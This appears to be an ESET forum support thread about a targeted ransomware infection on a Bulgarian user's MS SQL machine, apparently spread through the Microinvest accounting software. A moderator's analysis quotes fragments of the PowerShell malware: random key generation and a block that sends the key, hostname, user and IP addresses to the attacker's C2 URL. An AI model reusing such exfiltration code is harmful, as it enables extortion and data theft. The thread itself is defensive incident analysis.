cyberfear@decryptor

[ivaylogrig 0]

Hello,

My computer was infected with cyberfear@decryptor.

eis_logs.zip

[Marcos 5,189]

First of all, you have misconfigured ESET Internet Security. Attacks were conducted against MS SQL Server running on the machine but you have configured ESET not to block them:

Also you have created an exception for 2 IP addresses blocked by ESET, one of which is a known source of attacks:
https://www.abuseipdb.com/check/198.147.26.74

The following detections were stemming from a compromised MS SQL server:

a variant of MSIL/HackTool.BadPotato.C trojan

a variant of Win64/Kryptik.EDF trojan

a variant of Win64/Agent.DJU trojan

I'd suggest to:
1, Remove all IDS exceptions
2, Supply me with :
a) a couple of encrypted files, ideally Office documents
b) the ransomware note with payment instructions, if exists

[ivaylogrig 0]

1 hour ago, Marcos said:

Първо, вие сте конфигурирали неправилно ESET Internet Security. Бяха извършени атаки срещу MS SQL Server, работещ на машината, но вие сте конфигурирали ESET да не ги блокира:

Също така сте създали изключение за 2 IP адреса, блокирани от ESET, единият от които е известен източник на атаки:
https://www.abuseipdb.com/check/198.147.26.74

Следните откривания произтичат от компрометиран MS SQL сървър:

вариант на MSIL/HackTool.BadPotato.C троянски кон

вариант на троянски кон Win64/Kryptik.EDF

вариант на троянски кон Win64/Agent.DJU

Бих предложил да:
1, Премахнете всички IDS изключения
2, Доставете ми :
а) няколко криптирани файла, в идеалния случай Office документи
б) бележката за рансъмуер с инструкции за плащане, ако съществува

I am attaching some encrypted files and a ransomware note.

Infected.zip

[Marcos 5,189]

Unfortunately the files didn't help to determine how files were encrypted. It could have been a ransomware or a legit encryption tool that an adversary ran after gaining access to the machine.

[ivaylogrig 0]

How to clean the machine?

 

[Marcos 5,189]

Just run a full disk scan to make sure that no malware is detected. You computer should be clean. The ransomware is usually removed itself or the adversary deletes it after encryption.

[itman 1,727]

If the files were encrypted with BlackMatter ransomware, it might be possible to decrypt them: https://forum.eset.com/topic/39294-pc-infected-with-cyberfeardecryptor-sexaxglsy-files/?do=findComment&comment=178902

Edited May 19 by itman

[ivaylogrig 0]

1 hour ago, itman said:

Ако файловете са криптирани с рансъмуер BlackMatter, може да е възможно да ги дешифрирате: https://forum.eset.com/topic/39294-pc-infected-with-cyberfeardecryptor-sexaxglsy-files/?do=findComment&comment=178902

How do I know this?

[Marcos 5,189]

Normally you could check it via https://id-ransomware.malwarehunterteam.com but in this case the variant is unknown. The files could be encrypted by an attacker running a legitimate encryption tool when connected to your machine.

[Marcos 5,189]

It's a new Powershell malware, will be detected shortly as PowerShell/Filecoder.BM trojan. It was probably a targeted attack since it was not found on any other machine with ESET installed so far.

[ivaylogrig 0]

Yes the attack is targeted, I believe it is happening through a backup program of an accounting program I use.

[ivaylogrig 0]

9 minutes ago, Marcos said:

Това е нов злонамерен софтуер Powershell, скоро ще бъде открит като троянски кон PowerShell/Filecoder.BM. Вероятно е била целенасочена атака, тъй като досега не е открита на никоя друга машина с инсталиран ESET.

Ще бъдем ли защитени в бъдеще?

[itman 1,727]

26 minutes ago, Marcos said:

It's a new Powershell malware

Would have Eset recommended anti-ransomware rule to block any child process startup from PowerShell.exe detected and blocked  it?

[Marcos 5,189]

The PowerShell script infects local MS SQL databases by running "sqlcmd -S localhost ..." except 'master', 'tempdb', 'model', 'msdb'. Unfortunately the encryption key is random:

$PSRKey = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 24 | % {[char]$_})

and is sent to the attacker's C&C server:

    $C2Data = @"
    [>] Key: $PSRKey
    [>] Hostname: $computer
    [>] Current User: $domain$user
    [>] Current Time: $time
    [>] Local IP: $localIP
    [>] Public IP: $publicIP
"@

     $url = "http://$C2Server`:$C2Port/data"

 

[itman 1,727]

Perhaps Mallox ransomware;

Quote

The attacker created a stored procedure named cmd_exec that calls the SqlShell malware.

Finally, it called the stored procedure to execute a command passed in parameter which performs the following actions:

• Using echo and redirect, it creates a PowerShell script that downloads a binary and saves it to the ProgramData folder;
• It then calls PowerShell to execute the script;
• Finally, It uses WMIC to execute the binary.

https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/

Edited May 19 by itman

[safety 8]

On 5/19/2024 at 4:20 PM, ivaylogrig said:

I am attaching some encrypted files and a ransomware note.

Infected.zip

Can you upload these files to a cloud drive: Google or Yandex, and provide a link to download and determine the type of ransomware based on the encrypted file and the ransom note?

[Marcos 5,189]

It appears there has been a supply chain attack going on and targeting users of the Bulgarian accounting software Microinvest that uses SQL Express.

[itman 1,727]

3 hours ago, Marcos said:

It appears there has been a supply chain attack going on and targeting users of the Bulgarian accounting software Microinvest that uses SQL Express.

The beginnings of another infamous Petya-like attack?

Quote

It was believed that the software update mechanism of M.E.Doc [uk]—a Ukrainian tax preparation program that, according to F-Secure analyst Mikko Hyppönen, "appears to be de facto" among companies doing business in the country—had been compromised to spread the malware.^[13][18][19] Analysis by ESET found that a backdoor had been present in the update system for at least six weeks prior to the attack, describing it as a "thoroughly well-planned and well-executed operation".^[20] The developers of M.E.Doc denied that they were entirely responsible for the cyberattack, stating that they too were victims.^{[18][21][22][23]}

https://en.wikipedia.org/wiki/Petya_(malware_family)

Edited May 20 by itman

[itman 1,727]

Somewhat coincidental is the infamous 2019 Bulgarian Tax Agency hack was SQL injection based: https://www.acunetix.com/blog/web-security-zone/sql-injection-compromises-entire-country/ .